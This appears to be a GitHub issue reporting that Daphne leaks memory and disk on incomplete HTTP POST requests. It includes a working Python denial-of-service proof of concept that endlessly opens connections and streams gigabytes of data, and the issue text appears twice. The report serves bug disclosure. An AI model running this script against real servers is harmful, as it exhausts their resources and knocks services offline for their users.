You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Daphne does not seem to clean up after incomplete HTTP POST requests.
Back story: Twisted handles POST requests by saving the body to either the disk or memory, depending on the expected Content-Length. Normally this would be cleaned up when the request is finished. This cleanup does not seem to happen in Daphne.
import socket
while True:
print('Sending payload')
init_payload = b"""POST / HTTP/1.1\r\nHost: 127.0.0.1:8000\r\nContent-Length: 2000000000\r\n\r\n"""
pl = b'a'*9999
s = socket.create_connection(('127.0.0.1', 8000))
s.sendall(init_payload)
for _ in range(200000):
s.sendall(pl)
s.close()
My suggestion is to fix the bug and recommend not exposing a Twisted Web server directly to the internet. Even the default Twisted Web can be taken down with something like this although it requires a bit more persistence.
Side-note: I'm not sure what http_timeout does....
The text was updated successfully, but these errors were encountered:
Daphne does not seem to clean up after incomplete HTTP POST requests.
Back story: Twisted handles POST requests by saving the body to either the disk or memory, depending on the expected Content-Length. Normally this would be cleaned up when the request is finished. This cleanup does not seem to happen in Daphne.
Memory leak:
Disk leak:
My suggestion is to fix the bug and recommend not exposing a Twisted Web server directly to the internet. Even the default Twisted Web can be taken down with something like this although it requires a bit more persistence.
Side-note: I'm not sure what http_timeout does....
The text was updated successfully, but these errors were encountered: